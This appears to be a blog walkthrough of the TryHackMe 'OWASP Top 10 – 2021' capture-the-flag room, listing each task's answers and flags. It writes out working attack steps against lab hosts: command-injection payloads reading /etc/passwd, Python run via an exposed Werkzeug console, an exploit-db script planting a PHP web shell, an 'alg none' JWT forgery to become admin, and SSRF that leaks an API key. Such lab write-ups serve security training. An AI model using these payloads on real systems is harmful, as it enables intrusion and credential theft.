In this walk through, we will be going through the OWASP Top 10 – 2021 room from Tryhackme. This room has been designed to teach us about the OWASP Top 10 vulnerabilities and critical web security risks and how to exploit them in detail. So, let’s get started without any delay.
Table of Contents
Task 1 – Introduction
Task 2 – Accessing Machines
Task 3 – 1. Broken Access Control
Task 4 – Broken Access Control (IDOR Challenge)
Question 1 – Read and understand how IDOR works.
DoneQuestion 2 – Deploy the machine and go to http://10.10.192.147 – Login with the username noot and the password test1234.
Done
Question 3 – Look at other users’ notes. What is the flag?
- In the beginning, we have the id parameter set to 1. Increment it to exploit the IDOR. At 5, it gives a hint that we should go lower than 1. So tried “0” and found our flag.
flag{fivefourthree}
Task 5 – 2. Cryptographic Failures
Task 6 – Cryptographic Failures (Supporting Material 1)
Question 1 – Read and understand the supporting material on SQLite Databases.
Done
Task 7 – Cryptographic Failures (Supporting Material 2)
Question 1 – Read the supporting material about cracking hashes.
Done
Task 8 – Cryptographic Failures (Challenge)
Question 1 – What is the name of the mentioned directory?
/assetsQuestion 2 – Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?
webapp.dbQuestion 3 – Use the supporting material to access the sensitive data. What is the password hash of the admin user?
wh1terose@fsociety:~/CTF/TryHackme/OWASP Top 10 - 2021$ ls webapp.db wh1terose@fsociety:~/CTF/TryHackme/OWASP Top 10 - 2021$ sqlite3 webapp.db SQLite version 3.31.1 2020-01-27 19:55:54 Enter ".help" for usage hints. sqlite> .tables sessions users sqlite> PRAGMA table_info(sessions); 0|sessionID|TEXT|1||1 1|userID|TEXT|1||0 2|expiry|INT|1||0 sqlite> PRAGMA table_info(users); 0|userID|TEXT|1||1 1|username|TEXT|1||0 2|password|TEXT|1||0 3|admin|INT|1||0 sqlite> SELECT * FROM users; 4413096d9c933359b898b6202288a650|admin|6eea9b7ef19179a06954edd0f6c05ceb|1 23023b67a32488588db1e28579ced7ec|Bob|ad0234829205b9033196ba818f7a872b|1 4e8423b514eef575394ff78caed3254d|Alice|268b38ca7b84f44fa0a6cdc86e6301e0|0 sqlite>
6eea9b7ef19179a06954edd0f6c05cebQuestion 4 – Crack the hash. What is the admin’s plaintext password?
qwertyuiopQuestion 5 – Log in as the admin. What is the flag?
THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}
Task 9 – 3. Injection
Task 10 – 3.1. Command Injection
Question 1 – What strange text file is in the website’s root directory?
$(ls)
drpepper.txtQuestion 2 – How many non-root/non-service/non-daemon users are there?
$(ps -ef)
0Question 3 – What user is this app running as?
apacheQuestion 4 – What is the user’s shell set as?
$(grep "apache" /etc/passwd)
/sbin/nologinQuestion 5 – What version of Alpine Linux is running?
$(cat /etc/alpine-release)
3.16.0
Task 11 – 4. Insecure Design
Question 1 – Try to reset joseph’s password. Keep in mind the method used by the site to validate if you are indeed joseph.
DoneQuestion 2 – What is the value of the flag in joseph’s account?
- Upon looking on the login panel, we can see a “I forgot my password” hyperlink on the bottom right corner.
- The password Reset screen asks for a username for which we want to perform password reset. Enter – joseph
- Next, we will be prompted with a bunch of security questions, among the three, the question asking for the favourite color seems an easy one to crack. Tried bunch of colors and got lucky on “green”.
- Got the new password for the user. Now with the same, logged into the portal.
1KZQpxvE6yfrqt
- The Private Container holds our flag. Open it up and claim it.
THM{Not_3ven_c4tz_c0uld_sav3_U!}
Task 12 – 5. Security Misconfiguration
Question 1 – Navigate to http://10.10.151.53:86/console to access the Werkzeug console.
Done- Use the Werkzeug console to run the following Python code to execute the
ls -lcommand on the server:
Question 2 – What is the database file name (the one with the .db extension) in the current directory?
import os; print(os.popen("ls -l").read())
todo.dbQuestion 3 – Modify the code to read the contents of the app.py file, which contains the application’s source code. What is the value of the secret_flag variable in the source code?
- Used the following command to get the flag hidden in the source code.
import os; print(os.popen("vi app.py").read())
THM{Just_a_tiny_misconfiguration}
Task 13 – 6. Vulnerable and Outdated Components
Task 14 – Vulnerable and Outdated Components – Exploit
Question 1 – Read the above!
Done
Task 15 – Vulnerable and Outdated Components – Lab
Question 1 – What is the content of the /opt/flag.txt file?
- The target web application is running a bookstore made in PHP. On the bottom right corner, we can see “2017” which means it might be vulnerable.
- While Googling the CSE Bookstore 2017 vulnerabilities, that led me to this exploit. It is an Unauthenticated RCE in Online Book Store 1.0
Exploit: https://www.exploit-db.com/exploits/47887
- Downloaded the exploit and fired it on the application gives us our required flag.
wh1terose@fsociety:~/CTF/TryHackme/OWASP Top 10 - 2021$ python3 47887.py http://10.10.151.53:84/
> Attempting to upload PHP web shell...
> Verifying shell upload...
> Web shell uploaded to http://10.10.151.53:84/bootstrap/img/lXgjjmC5EL.php
> Example command usage: http://10.10.151.53:84/bootstrap/img/lXgjjmC5EL.php?cmd=whoami
> Do you wish to launch a shell here? (y/n): y
RCE $ cat /opt/flag.txt
THM{But_1ts_n0t_my_f4ult!}
RCE $ 
THM{But_1ts_n0t_my_f4ult!}
Task 16 – 7. Identification and Authentication Failures
Task 17 – Identification and Authentication Failures Practical
Question 1 – What is the flag that you found in darren’s account?
- Try registering the user with a space in front ” darren”. Once createdm, login and get the flag.
fe86079416a21a3c99937fea8874b667Question 2 – Now try to do the same trick and see if you can log in as arthur.
Done
Question 3 – What is the flag that you found in arthur’s account?
d9ac0f7db4fda460ac3edeb75d75e16e
Task 18 – 8. Software and Data Integrity Failures
Question 1 – Read the above and continue!
Done
Task 19 – Software Integrity Failures
Question 1 – What is the SHA-256 hash of https://code.jquery.com/jquery-1.12.4.min.js?
sha256-ZosEbRLbNQzLpnKIkEdrPv7lOy9C27hHQ+Xp8a4MxAQ=
Task 20 – Data Integrity Failures
Question 1 – Try logging into the application as guest. What is guest’s account password?
- Try entering some random password for user “guest”. The error will reveal the “password” for it.
- If your login was successful, you should now have a JWT stored as a cookie in your browser. Press F12 to bring out the Developer Tools.
Depending on your browser, you will be able to edit cookies from the following tabs:
Firefox
Chrome
guestQuestion 2 – What is the name of the website’s cookie containing a JWT token?
- Open up browser’s developer console and navigate to Storage -> Cookies.
jwt-sessionQuestion 3 – Use the knowledge gained in this task to modify the JWT token so that the application thinks you are the user “admin”.
Done- Next, we have to modify the JWT token. First modify the first part which consist of header and Hash Algorithm.
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6Imd1ZXN0IiwiZXhwIjoxNjg3OTAwNzk3fQ.wolRWvkEIThUxW_fLQkXPgp-PWcojfaOxPL0d62A1rA
- Change the Hash algo to “none”.
- Now, go back to the other part from the string. It reveals the payload part. Change the username from guest to admin and encode it back with base64.
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0
- Combine the header and payload encoded string and refresh the page. It will give you to flag.
eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjg3OTAwNzk3fQ==
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0=.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjc5ODY1MDU5fQ==.
Task 21 – 9. Security Logging and Monitoring Failures
Question 1 – What IP address is the attacker using?
wh1terose@fsociety:~/CTF/TryHackme/OWASP Top 10 - 2021$ cat login-logs.txt 200 OK 12.55.22.88 jr22 2019-03-18T09:21:17 /login 200 OK 14.56.23.11 rand99 2019-03-18T10:19:22 /login 200 OK 17.33.10.38 afer11 2019-03-18T11:11:44 /login 200 OK 99.12.44.20 rad4 2019-03-18T11:55:51 /login 200 OK 67.34.22.10 bff1 2019-03-18T13:08:59 /login 200 OK 34.55.11.14 hax0r 2019-03-21T16:08:15 /login 401 Unauthorised 49.99.13.16 admin 2019-03-21T21:08:15 /login 401 Unauthorised 49.99.13.16 administrator 2019-03-21T21:08:20 /login 401 Unauthorised 49.99.13.16 anonymous 2019-03-21T21:08:25 /login 401 Unauthorised 49.99.13.16 root 2019-03-21T21:08:30 /login
49.99.13.16Question 2 – What kind of attack is being carried out?
Brute Force
Task 22 – 10. Server-Side Request Forgery (SSRF)
Question 1 – Explore the website. What is the only host allowed to access the admin area?
- http://10.10.151.53:8087/admin
localhostQuestion 2 – Check the “Download Resume” button. Where does the server parameter point to?
- http://10.10.151.53:8087/download?server=secure-file-storage.com:8087&id=75482342
secure-file-storage.comQuestion 3 – Using SSRF, make the application send the request to your AttackBox instead of the secure file storage. Are there any API keys in the intercepted request?
- 10.10.151.53:8087/download?server=10.18.11.103:4444&id=75482342
THM{Hello_Im_just_an_API_key}
Task 23 – What Next?
Also Read: Tryhackme – OWASP Juice Shop
So that was “OWASP Top 10 – 2021” for you. In this room, we have covered the OWASP Top 10 web application vulnerabilities and their exploitation, We have covered vulnerabilities like Broken Authentication which includes IDOR and more. Then, we took a dive in Cryptographic failures. Moving on, we learned about Injections, Insecure Design, Security Misconfiguration, Vulnerable and outdated components, Identification and authentication failure, SSRF, and much more. This room was certainly very lengthy but covers everything in great detail regarding the OWASP Top 10 risks and vulnerabilities. On that note, i will take your leave and will meet you in next one. Till then, “Keep Hacking”.
